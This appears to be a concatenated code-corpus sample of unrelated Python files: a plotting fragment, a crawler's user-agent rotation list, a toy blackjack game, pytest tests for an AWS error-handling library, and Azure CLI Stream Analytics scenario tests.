axes[n].legend(loc='upper right')
else:
raise Exception(f'Illegal mode {cmd}')
fig.tight_layout()
if OUTPUT=='x11' : plt.show()
else: plt.savefig(OUTPUT, dpi=500)
|
analysis/plotter.py
|
| 0.278159 | 0.291006 |
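To make the CSFv/AVCSFv branches above concrete, here is a tiny self-contained sketch (with made-up numbers) of the projection they perform: a label vector is combined with the diabatic populations via np.dot.
import numpy as np
diabats = np.array([[1.0, 0.7, 0.4],   # CSF 1 population over three time steps
                    [0.0, 0.3, 0.6]])  # CSF 2
vector = np.array([1.0, 1.0])          # label "total" = CSF1 + CSF2
print(np.dot(vector, diabats))         # -> [1. 1. 1.]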
import random
class UserAgent:
pc_agents = [
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
        'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11',
'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11',
'Opera/9.25 (Windows NT 5.1; U; en)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12',
'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.2.9',
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.7 (KHTML, like Gecko) Ubuntu/11.04 Chromium/16.0.912.77 Chrome/16.0.912.77 Safari/535.7",
"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:10.0) Gecko/20100101 Firefox/10.0 ",
]
mobile_agents = [
'Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5',
'Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5',
'Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5',
'Mozilla/5.0 (Linux; U; Android 2.3.7; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
'MQQBrowser/26 Mozilla/5.0 (Linux; U; Android 2.3.7; zh-cn; MB200 Build/GRJ22; CyanogenMod-7) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
'Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10',
'Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+',
'Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.0; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/233.70 Safari/534.6 TouchPad/1.0',
'Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/20.0.019; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) BrowserNG/7.1.18124',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; HTC; Titan)',
'Mozilla/4.0 (compatible; MSIE 6.0; ) Opera/UCWEB7.0.2.37/28/999'
]
@staticmethod
def get_pc_agent(index):
return UserAgent.pc_agents[index]
@staticmethod
def get_mobile_agent(index):
return UserAgent.mobile_agents[index]
@staticmethod
def get_pc_agent_randomly():
index = random.randint(0, len(UserAgent.pc_agents)-1)
return UserAgent.get_pc_agent(index)
@staticmethod
def get_mobile_agent_randomly():
index = random.randint(0, len(UserAgent.mobile_agents)-1)
return UserAgent.get_mobile_agent(index)
@staticmethod
def get_agent_randomly():
        if random.randint(1, 10) % 2 == 0:
return UserAgent.get_pc_agent_randomly()
else:
return UserAgent.get_mobile_agent_randomly()
|
python/img/reptiles_imgs/util/user_agents.py
|
| 0.393502 | 0.047758 |
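A short sketch of how the UserAgent class above might be used to set a request header; the import path and target URL are assumptions for illustration.
import requests
from util.user_agents import UserAgent  # assumed import path, matching the repo listing above
headers = {'User-Agent': UserAgent.get_agent_randomly()}
response = requests.get('https://example.com', headers=headers, timeout=10)
print(response.status_code, headers['User-Agent'])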
import sys
from typing import List
import pyCardDeck
from pyCardDeck.cards import PokerCard
class Person:
    def __init__(self, name: str):
        self.h = []
        self.n = name
    def __str__(self):
        return self.n
class BlackTheJack:
    def __init__(self, persons: List[Person]):
        self.deck = pyCardDeck.Deck()
        self.deck.load_standard_deck()
        # Burn pass: discard any tens found in the top 44 cards, put the rest back
        for i in range(44):
            bur = self.deck.draw()
            if bur.rank == '10':
                self.deck.discard(bur)
            else:
                self.deck.add_single(bur)
        self.persons = persons
        self.scores = {}
        print("Let's play a game with {} people.".format(len(self.persons)))
    def blackjack(self):
        """
        Play a round of blackjack.
        If no one gets 21, the person closest to 21 wins.
        """
        print("Let's start.")
        self.deck.shuffle()
        print("Shuffled the deck.")
        print("Time to deal.")
        self.deal()
        print("Now let's play.")
        for person in self.persons:
            print("{}, it's your turn.".format(person.n))
            self.play(person)
        else:
            self.find_winner()
    def deal(self):
        """
        Deal two cards to each person.
        """
        for _ in range(2):
            for p in self.persons:
                newcard = self.deck.draw()
                p.h.append(newcard)
                print("Dealt {} the {}.".format(p.n, str(newcard)))
    def find_winner(self):
        """
        Find and announce the winner(s).
        """
        winners = []
        try:
            win_score = max(self.scores.values())
            for key in self.scores.keys():
                if self.scores[key] == win_score:
                    winners.append(key)
            else:
                winstring = " & ".join(winners)
                print("The winner is {}!".format(winstring))
        except ValueError:
            print("No one won.")
def hit(self, person):
newcard = self.deck.draw()
person.h.append(newcard)
print("Drew the {}.".format(str(newcard)))
def play(self, person):
"""
An individual person's turn.
If the person's cards are an ace and a ten or court card,
the person has a blackjack and wins.
If a person's cards total more than 21, the person loses.
Otherwise, it takes the sum of their cards and determines whether
to hit or stand based on their current score.
"""
        while True:
            points = sum_h(person.h)
            if points < 17:
                print(" Hit.")
                self.hit(person)
            elif points == 21:
                print(" {} wins!".format(person.n))
                sys.exit(0)  # End if someone wins
            elif points > 21:
                print(" Bust!")
                break
            else:  # Stand if between 17 and 20 (inclusive)
                print(" Standing at {} points.".format(points))
                self.scores[person.n] = points
                break
def sum_h(h: list):
    """
    Convert face cards to numbers (K/Q/J = 10, A = 1) and score the hand.
    """
vals = [card.rank for card in h]
intvals = []
while len(vals) > 0:
value = vals.pop()
try:
intvals.append(int(value))
except ValueError:
if value in ['K', 'Q', 'J']:
intvals.append(10)
elif value == 'A':
intvals.append(1) # Keep it simple for the sake of example
    if intvals == [1, 10] or intvals == [10, 1]:
        print(" Blackjack!")
        return 21
    else:
        points = sum(intvals)
        print(" Current score: {}".format(points))
        return points
if __name__ == "__main__":
game = BlackTheJack([Person("RAM"), Person("SITA"), Person("AMBANI"),Person("JHON"), Person("PLAYES"),
Person("DCKSON")])
game.blackjack()
|
task2.py
|
| 0.251096 | 0.219861 |
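The scoring rule in sum_h above can be checked in isolation; this standalone sketch re-implements it on plain rank strings (no deck needed) so the blackjack/bust thresholds are easy to verify.
def score(ranks):
    # K/Q/J count as 10, A as 1, everything else as its face value
    vals = [10 if r in ('K', 'Q', 'J') else 1 if r == 'A' else int(r) for r in ranks]
    return 21 if sorted(vals) == [1, 10] else sum(vals)
print(score(['A', 'K']))       # 21 -> two-card blackjack
print(score(['9', '7', '5']))  # 21 -> winning hand
print(score(['K', 'Q', '5']))  # 25 -> bust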
import pytest
import re
import secrets
from botocore.exceptions import ClientError
from aws_error_utils import (
get_aws_error_info,
aws_error_matches,
catch_aws_error,
ALL_CODES,
ALL_OPERATIONS,
errors,
make_aws_error,
)
rand_str = lambda: secrets.token_hex(4)
def _make_test_error(
operation_name, code=None, message=None, http_status_code=None, error=True
):
response = {}
if error or code or message:
response["Error"] = {}
if code:
response["Error"]["Code"] = code
if message:
response["Error"]["Message"] = message
if http_status_code:
response["ResponseMetadata"] = {"HTTPStatusCode": http_status_code}
return ClientError(response, operation_name)
def test_create_error_info():
error = _make_test_error("AssumeRole", "RegionDisabled", http_status_code=403)
error_info = get_aws_error_info(error)
assert error_info.code == "RegionDisabled"
assert error_info.operation_name == "AssumeRole"
assert error_info.http_status_code == 403
assert error_info.message is None
not_error = ValueError("not a ClientError")
with pytest.raises(TypeError):
get_aws_error_info(not_error)
def test_error_info_missing_code():
error = _make_test_error("AssumeRole")
error_info = get_aws_error_info(error)
assert error_info.code is None
def test_error_matches_requires_code():
with pytest.raises(ValueError, match="No error codes provided"):
error = _make_test_error("AssumeRole", "RegionDisabled")
aws_error_matches(error)
with pytest.raises(ValueError, match="No error codes provided"):
error = _make_test_error("AssumeRole", "RegionDisabled")
aws_error_matches(error, operation_name="AssumeRole")
def test_error_matches_single():
error = _make_test_error("AssumeRole", "RegionDisabled")
assert aws_error_matches(error, "RegionDisabled")
assert aws_error_matches(error, "RegionDisabled", "OtherCode")
assert aws_error_matches(error, "RegionDisabled", code="OtherCode")
assert aws_error_matches(error, "RegionDisabled", code=["OtherCode"])
assert aws_error_matches(error, "OtherCode", code="RegionDisabled")
assert aws_error_matches(error, "OtherCode", code=["RegionDisabled"])
assert not aws_error_matches(error, "OtherCode")
assert not aws_error_matches(error, code="OtherCode")
assert not aws_error_matches(error, code=["OtherCode"])
assert aws_error_matches(error, "RegionDisabled", operation_name="AssumeRole")
assert aws_error_matches(
error, "RegionDisabled", operation_name=["AssumeRole", "OtherOp"]
)
assert not aws_error_matches(error, "RegionDisabled", operation_name="OtherOp")
def test_error_matches_all():
code = rand_str()
error = _make_test_error("OpName", code)
assert aws_error_matches(error, ALL_CODES)
assert not aws_error_matches(error, "SpecificCode")
op_name = rand_str()
error = _make_test_error(op_name, "SomeCode")
assert aws_error_matches(error, "SomeCode", operation_name=ALL_OPERATIONS)
assert not aws_error_matches(error, "SomeCode", operation_name="SpecificOperation")
def test_catch():
error = _make_test_error("AssumeRole", "RegionDisabled")
try:
raise error
except catch_aws_error("RegionDisabled") as e:
assert e is error
with pytest.raises(ClientError, match=re.escape(str(error))):
try:
raise error
except catch_aws_error("OtherCode") as e:
assert False
def matcher(client_error):
return client_error is error
try:
raise error
except catch_aws_error(matcher) as e:
assert e is error
def nonmatcher(client_error):
return False
with pytest.raises(ClientError, match=re.escape(str(error))):
try:
raise error
except catch_aws_error(nonmatcher) as e:
assert False
class OtherError(Exception):
pass
try:
raise OtherError("test")
except catch_aws_error(ALL_CODES) as e:
assert False
except OtherError:
assert True
def test_catch_sets_info():
operation_name = rand_str()
code = rand_str()
message = rand_str()
http_status_code = 404
error = _make_test_error(
operation_name, code=code, message=message, http_status_code=http_status_code
)
try:
raise error
except catch_aws_error(code) as error:
assert error.operation_name == operation_name
assert error.code == code
assert error.message == message
assert error.http_status_code == http_status_code
def test_errors():
error = _make_test_error("AssumeRole", "RegionDisabled", http_status_code=403)
try:
raise error
assert False
except errors.RegionDisabled:
pass
try:
raise error
assert False
except (errors.NoSuchRegion, errors.RegionDisabled):
pass
with pytest.raises(RuntimeError):
errors.RegionDisabled
with pytest.raises(RuntimeError):
errors()
def test_make_aws_error():
args = {
"operation_name": "AssumeRole",
"code": "RegionDisabled",
"message": "Region is disabled",
"http_status_code": 403,
}
error_standard = _make_test_error(**args)
error = make_aws_error(**args)
assert isinstance(error, ClientError)
assert error_standard.operation_name == error.operation_name
assert error_standard.response == error.response
assert error_standard.args == error.args
try:
raise make_aws_error(**args)
except errors.RegionDisabled:
pass
response_key1 = rand_str()
response_value1 = rand_str()
response_key2 = rand_str()
response_key3 = rand_str()
response_value3 = rand_str()
response = {
response_key1: response_value1,
"ResponseMetadata": {
response_key2: {
response_key3: response_value3,
}
},
}
error_code = rand_str()
operation_name = rand_str()
http_status_code = 404
error = make_aws_error(
code=error_code,
message=None,
operation_name=operation_name,
http_status_code=http_status_code,
response=response,
)
    assert error.response is not response  # a copy was made
assert "Error" not in response
assert error.response == {
"Error": {"Code": error_code},
response_key1: response_value1,
"ResponseMetadata": {
"HTTPStatusCode": http_status_code,
response_key2: {
response_key3: response_value3,
},
},
}
|
test_aws_error_utils.py
|
import pytest
import re
import secrets
from botocore.exceptions import ClientError
from aws_error_utils import (
get_aws_error_info,
aws_error_matches,
catch_aws_error,
ALL_CODES,
ALL_OPERATIONS,
errors,
make_aws_error,
)
rand_str = lambda: secrets.token_hex(4)
def _make_test_error(
operation_name, code=None, message=None, http_status_code=None, error=True
):
response = {}
if error or code or message:
response["Error"] = {}
if code:
response["Error"]["Code"] = code
if message:
response["Error"]["Message"] = message
if http_status_code:
response["ResponseMetadata"] = {"HTTPStatusCode": http_status_code}
return ClientError(response, operation_name)
def test_create_error_info():
error = _make_test_error("AssumeRole", "RegionDisabled", http_status_code=403)
error_info = get_aws_error_info(error)
assert error_info.code == "RegionDisabled"
assert error_info.operation_name == "AssumeRole"
assert error_info.http_status_code == 403
assert error_info.message is None
not_error = ValueError("not a ClientError")
with pytest.raises(TypeError):
get_aws_error_info(not_error)
def test_error_info_missing_code():
error = _make_test_error("AssumeRole")
error_info = get_aws_error_info(error)
assert error_info.code is None
def test_error_matches_requries_code():
with pytest.raises(ValueError, match="No error codes provided"):
error = _make_test_error("AssumeRole", "RegionDisabled")
aws_error_matches(error)
with pytest.raises(ValueError, match="No error codes provided"):
error = _make_test_error("AssumeRole", "RegionDisabled")
aws_error_matches(error, operation_name="AssumeRole")
def test_error_matches_single():
error = _make_test_error("AssumeRole", "RegionDisabled")
assert aws_error_matches(error, "RegionDisabled")
assert aws_error_matches(error, "RegionDisabled", "OtherCode")
assert aws_error_matches(error, "RegionDisabled", code="OtherCode")
assert aws_error_matches(error, "RegionDisabled", code=["OtherCode"])
assert aws_error_matches(error, "OtherCode", code="RegionDisabled")
assert aws_error_matches(error, "OtherCode", code=["RegionDisabled"])
assert not aws_error_matches(error, "OtherCode")
assert not aws_error_matches(error, code="OtherCode")
assert not aws_error_matches(error, code=["OtherCode"])
assert aws_error_matches(error, "RegionDisabled", operation_name="AssumeRole")
assert aws_error_matches(
error, "RegionDisabled", operation_name=["AssumeRole", "OtherOp"]
)
assert not aws_error_matches(error, "RegionDisabled", operation_name="OtherOp")
def test_error_matches_all():
code = rand_str()
error = _make_test_error("OpName", code)
assert aws_error_matches(error, ALL_CODES)
assert not aws_error_matches(error, "SpecificCode")
op_name = rand_str()
error = _make_test_error(op_name, "SomeCode")
assert aws_error_matches(error, "SomeCode", operation_name=ALL_OPERATIONS)
assert not aws_error_matches(error, "SomeCode", operation_name="SpecificOperation")
def test_catch():
error = _make_test_error("AssumeRole", "RegionDisabled")
try:
raise error
except catch_aws_error("RegionDisabled") as e:
assert e is error
with pytest.raises(ClientError, match=re.escape(str(error))):
try:
raise error
except catch_aws_error("OtherCode") as e:
assert False
def matcher(client_error):
return client_error is error
try:
raise error
except catch_aws_error(matcher) as e:
assert e is error
def nonmatcher(client_error):
return False
with pytest.raises(ClientError, match=re.escape(str(error))):
try:
raise error
except catch_aws_error(nonmatcher) as e:
assert False
class OtherError(Exception):
pass
try:
raise OtherError("test")
except catch_aws_error(ALL_CODES) as e:
assert False
except OtherError:
assert True
def test_catch_sets_info():
operation_name = rand_str()
code = rand_str()
message = rand_str()
http_status_code = 404
error = _make_test_error(
operation_name, code=code, message=message, http_status_code=http_status_code
)
try:
raise error
except catch_aws_error(code) as error:
assert error.operation_name == operation_name
assert error.code == code
assert error.message == message
assert error.http_status_code == http_status_code
def test_errors():
error = _make_test_error("AssumeRole", "RegionDisabled", http_status_code=403)
try:
raise error
assert False
except errors.RegionDisabled:
pass
try:
raise error
assert False
except (errors.NoSuchRegion, errors.RegionDisabled):
pass
with pytest.raises(RuntimeError):
errors.RegionDisabled
with pytest.raises(RuntimeError):
errors()
def test_make_aws_error():
args = {
"operation_name": "AssumeRole",
"code": "RegionDisabled",
"message": "Region is disabled",
"http_status_code": 403,
}
error_standard = _make_test_error(**args)
error = make_aws_error(**args)
assert isinstance(error, ClientError)
assert error_standard.operation_name == error.operation_name
assert error_standard.response == error.response
assert error_standard.args == error.args
try:
raise make_aws_error(**args)
except errors.RegionDisabled:
pass
response_key1 = rand_str()
response_value1 = rand_str()
response_key2 = rand_str()
response_key3 = rand_str()
response_value3 = rand_str()
response = {
response_key1: response_value1,
"ResponseMetadata": {
response_key2: {
response_key3: response_value3,
}
},
}
error_code = rand_str()
operation_name = rand_str()
http_status_code = 404
error = make_aws_error(
code=error_code,
message=None,
operation_name=operation_name,
http_status_code=http_status_code,
response=response,
)
    assert error.response is not response  # a copy was made
assert "Error" not in response
assert error.response == {
"Error": {"Code": error_code},
response_key1: response_value1,
"ResponseMetadata": {
"HTTPStatusCode": http_status_code,
response_key2: {
response_key3: response_value3,
},
},
}
| 0.540924 | 0.319891 |
# pylint: disable=line-too-long
# pylint: disable=too-many-lines
import json
from azure.cli.testsdk import (
ResourceGroupPreparer,
ScenarioTest,
StorageAccountPreparer
)
from azure.cli.testsdk.scenario_tests import AllowLargeResponse
class StreamAnalyticsClientTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_", location="westus")
def test_job_crud(self):
self.kwargs.update({
"job_name": "job",
"locale": "en-US"
})
# create a streaming job
self.cmd(
"stream-analytics job create -n {job_name} -g {rg} \
--data-locale {locale} \
--output-error-policy Drop --out-of-order-policy Drop \
--order-max-delay 0 --arrival-max-delay 5",
checks=[
self.check("name", "{job_name}"),
self.check("type", "Microsoft.StreamAnalytics/streamingjobs")
]
)
# retrieve/update a streaming job
self.cmd(
"stream-analytics job list -g {rg}",
checks=[
self.check("length(@)", 1),
self.check("@[0].name", "{job_name}")
]
)
self.cmd(
"stream-analytics job update -n {job_name} -g {rg} \
--order-max-delay 10 --arrival-max-delay 29"
)
self.cmd(
"stream-analytics job show -n {job_name} -g {rg}",
checks=[
self.check("eventsOutOfOrderMaxDelayInSeconds", 10),
self.check("eventsLateArrivalMaxDelayInSeconds", 29)
]
)
# delete a streaming job
self.cmd("stream-analytics job delete -n {job_name} -g {rg} --yes")
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_", location="westus")
def test_transformation_crud(self):
self.kwargs.update({
"job_name": "job",
"transformation_name": "transformation",
"input_name": "input",
"output_name": "output",
"locale": "en-US"
})
# create a streaming job
self.cmd(
"stream-analytics job create -n {job_name} -g {rg} \
--data-locale {locale} \
--output-error-policy Drop --out-of-order-policy Drop \
--order-max-delay 0 --arrival-max-delay 5"
)
# create a transformation
self.kwargs["saql"] = f"SELECT * INTO {self.kwargs['output_name']} FROM {self.kwargs['input_name']}"
self.cmd(
"stream-analytics transformation create -n {transformation_name} -g {rg} \
--job-name {job_name} \
--saql '{saql}' --streaming-units 6",
checks=[
self.check("name", "{transformation_name}"),
self.check("type", "Microsoft.StreamAnalytics/streamingjobs/transformations")
]
)
# retrieve/update a transformation
self.cmd(
"stream-analytics transformation update -n {transformation_name} -g {rg} \
--job-name {job_name} --saql '{saql}' --streaming-units 3"
)
self.cmd(
"stream-analytics transformation show -n {transformation_name} -g {rg} --job-name {job_name}",
checks=[
self.check("name", "{transformation_name}"),
self.check("streamingUnits", 3)
]
)
@AllowLargeResponse()
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_", location="westus")
@StorageAccountPreparer(parameter_name="storage_account")
def test_input_crud(self, storage_account):
self.kwargs.update({
"job_name": "job",
"input_name": "input",
"locale": "en-US",
"account": storage_account,
"container": "container"
})
# create a streaming job
self.cmd(
"stream-analytics job create -n {job_name} -g {rg} \
--data-locale {locale} \
--output-error-policy Drop --out-of-order-policy Drop \
--order-max-delay 0 --arrival-max-delay 5"
)
# prepare storage account
self.kwargs["key"] = self.cmd(
"storage account keys list --account-name {account}"
).get_output_in_json()[0]["value"]
self.cmd(
"storage container create -n {container} \
--account-name {account} --account-key {key}"
)
# create/test an input
props = {
"type": "Reference",
"datasource": {
"type": "Microsoft.Storage/Blob",
"properties": {
"container": self.kwargs["container"],
"dateFormat": "yyyy/MM/dd",
"pathPattern": "{date}/{time}",
"storageAccounts": [{
"accountName": self.kwargs["account"],
"accountKey": self.kwargs["key"]
}],
"timeFormat": "HH"
}
},
"serialization": {
"type": "Csv",
"properties": {
"encoding": "UTF8",
"fieldDelimiter": ","
}
}
}
self.kwargs["properties"] = json.dumps(props)
self.cmd(
"stream-analytics input create -n {input_name} -g {rg} \
--job-name {job_name} \
--properties '{properties}'",
checks=[
self.check("name", "{input_name}"),
self.check("type", "Microsoft.StreamAnalytics/streamingjobs/inputs")
]
)
self.cmd(
"stream-analytics input test -n {input_name} -g {rg} \
--job-name {job_name} \
--properties '{properties}'",
checks=[
self.check("status", "TestSucceeded")
]
)
# retrieve/update an input
self.cmd(
"stream-analytics input list -g {rg} --job-name {job_name}",
checks=[
self.check("length(@)", 1),
self.check("@[0].name", "{input_name}")
]
)
props["datasource"]["properties"]["dateFormat"] = "MM/dd/yyyy"
self.kwargs["properties"] = json.dumps(props)
self.cmd(
"stream-analytics input update -n {input_name} -g {rg} \
--job-name {job_name} --properties '{properties}'"
)
self.cmd(
"stream-analytics input show -n {input_name} -g {rg} --job-name {job_name}",
checks=[
self.check("name", "{input_name}"),
self.check("properties.datasource.dateFormat", "MM/dd/yyyy")
]
)
# delete an input
self.cmd("stream-analytics input delete -n {input_name} -g {rg} --job-name {job_name} --yes")
@AllowLargeResponse()
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_", location="westus")
@StorageAccountPreparer(parameter_name="storage_account")
def test_output_crud(self, storage_account):
self.kwargs.update({
"job_name": "job",
"output_name": "output",
"locale": "en-US",
"account": storage_account,
"container": "container"
})
# create a streaming job
self.cmd(
"stream-analytics job create -n {job_name} -g {rg} \
--data-locale {locale} \
--output-error-policy Drop --out-of-order-policy Drop \
--order-max-delay 0 --arrival-max-delay 5"
)
# prepare storage account
self.kwargs["key"] = self.cmd(
"storage account keys list --account-name {account}"
).get_output_in_json()[0]["value"]
self.cmd(
"storage container create -n {container} \
--account-name {account} --account-key {key}"
)
# create/test an output
datasource_props = {
"type": "Microsoft.Storage/Blob",
"properties": {
"storageAccounts": [{
"accountName": self.kwargs["account"],
"accountKey": self.kwargs["key"]
}],
"container": self.kwargs["container"],
"pathPattern": "{date}/{time}",
"dateFormat": "yyyy/MM/dd",
"timeFormat": "HH"
}
}
serialization_props = {
"type": "Csv",
"properties": {
"fieldDelimiter": ",",
"encoding": "UTF8"
}
}
self.kwargs["datasource"] = json.dumps(datasource_props)
self.kwargs["serialization"] = json.dumps(serialization_props)
self.cmd(
"stream-analytics output create -n {output_name} -g {rg} \
--job-name {job_name} \
--datasource '{datasource}' --serialization '{serialization}'",
checks=[
self.check("name", "{output_name}"),
self.check("type", "Microsoft.StreamAnalytics/streamingjobs/outputs")
]
)
self.cmd(
"stream-analytics output test -n {output_name} -g {rg} \
--job-name {job_name} \
--datasource '{datasource}' --serialization '{serialization}'",
checks=[
self.check("status", "TestSucceeded")
]
)
# retrieve/update an output
self.cmd(
"stream-analytics output list -g {rg} --job-name {job_name}",
checks=[
self.check("length(@)", 1),
self.check("@[0].name", "{output_name}")
]
)
datasource_props["properties"]["dateFormat"] = "MM/dd/yyyy"
self.kwargs["datasource"] = json.dumps(datasource_props)
self.cmd(
"stream-analytics output update -n {output_name} -g {rg} \
--job-name {job_name} \
--datasource '{datasource}' --serialization '{serialization}'"
)
self.cmd(
"stream-analytics output show -n {output_name} -g {rg} --job-name {job_name}",
checks=[
self.check("name", "{output_name}"),
self.check("datasource.dateFormat", "MM/dd/yyyy")
]
)
# delete an output
self.cmd("stream-analytics output delete -n {output_name} -g {rg} --job-name {job_name} --yes")
@AllowLargeResponse()
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_", location="westus")
@StorageAccountPreparer(parameter_name="storage_account")
def test_job_scale(self, storage_account):
self.kwargs.update({
"job_name": "job",
"transformation_name": "transformation",
"input_name": "input",
"output_name": "output",
"locale": "en-US",
"account": storage_account,
"container": "container"
})
# create a streaming job
self.cmd(
"stream-analytics job create -n {job_name} -g {rg} \
--data-locale {locale} \
--output-error-policy Drop --out-of-order-policy Drop \
--order-max-delay 0 --arrival-max-delay 5"
)
# create a transformation
self.kwargs["saql"] = f"SELECT * INTO {self.kwargs['output_name']} FROM {self.kwargs['input_name']}"
self.cmd(
"stream-analytics transformation create -n {transformation_name} -g {rg} \
--job-name {job_name} \
--saql '{saql}' --streaming-units 6"
)
# prepare storage account
self.kwargs["key"] = self.cmd(
"storage account keys list --account-name {account}"
).get_output_in_json()[0]["value"]
self.cmd(
"storage container create -n {container} \
--account-name {account} --account-key {key}"
)
# create an input
self.kwargs["properties"] = json.dumps({
"type": "Stream",
"datasource": {
"type": "Microsoft.Storage/Blob",
"properties": {
"storageAccounts": [{
"accountName": self.kwargs["account"],
"accountKey": self.kwargs["key"]
}],
"container": self.kwargs["container"],
"pathPattern": "{date}/{time}",
"dateFormat": "MM/dd/yyyy",
"timeFormat": "HH",
"sourcePartitionCount": 16
}
},
"serialization": {
"type": "Csv",
"properties": {
"fieldDelimiter": ",",
"encoding": "UTF8"
}
}
})
self.cmd(
"stream-analytics input create -n {input_name} -g {rg} \
--job-name {job_name} --properties '{properties}'"
)
# create an output
self.kwargs["datasource"] = json.dumps({
"type": "Microsoft.Storage/Blob",
"properties": {
"storageAccounts": [{
"accountName": self.kwargs["account"],
"accountKey": self.kwargs["key"]
}],
"container": self.kwargs["container"],
"pathPattern": "{date}/{time}",
"dateFormat": "yyyy/MM/dd",
"timeFormat": "HH"
}
})
self.kwargs["serialization"] = json.dumps({
"type": "Csv",
"properties": {
"fieldDelimiter": ",",
"encoding": "UTF8"
}
})
self.cmd(
"stream-analytics output create -n {output_name} -g {rg} \
--job-name {job_name} \
--datasource '{datasource}' --serialization '{serialization}'"
)
# start/stop a running job
self.cmd("stream-analytics job start -n {job_name} -g {rg} --output-start-mode JobStartTime")
self.cmd("stream-analytics job stop -n {job_name} -g {rg}")
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_", location="westus")
def test_function_crud(self):
self.kwargs.update({
"job_name": "job",
"function_name": "function",
"workspace_name": "workspace",
"locale": "en-US"
})
# create a streaming job
self.cmd(
"stream-analytics job create -n {job_name} -g {rg} \
--data-locale {locale} \
--output-error-policy Drop --out-of-order-policy Drop \
--order-max-delay 0 --arrival-max-delay 5"
)
# create/test a function
props = {
"type": "Scalar",
"properties": {
"inputs": [{
"dataType": "Any"
}],
"output": {
"dataType": "Any"
},
"binding": {
"type": "Microsoft.StreamAnalytics/JavascriptUdf",
"properties": {
"script": "function (a, b) { return a + b; }"
}
}
}
}
self.kwargs["props"] = json.dumps(props)
self.cmd(
"stream-analytics function create -n {function_name} -g {rg} \
--job-name {job_name} --properties '{props}'",
checks=[
self.check("name", "{function_name}"),
self.check("type", "Microsoft.StreamAnalytics/streamingjobs/functions")
]
)
self.cmd(
"stream-analytics function test -n {function_name} -g {rg} \
--job-name {job_name} --properties '{props}'",
checks=[
self.check("status", "TestFailed")
]
)
# retrieve/update a function
self.cmd(
"stream-analytics function list -g {rg} --job-name {job_name}",
checks=[
self.check("length(@)", 1),
self.check("@[0].name", "{function_name}")
]
)
props["properties"]["binding"]["properties"]["script"] = "function (a, b) { return a * b; }"
self.kwargs["props"] = json.dumps(props)
self.cmd(
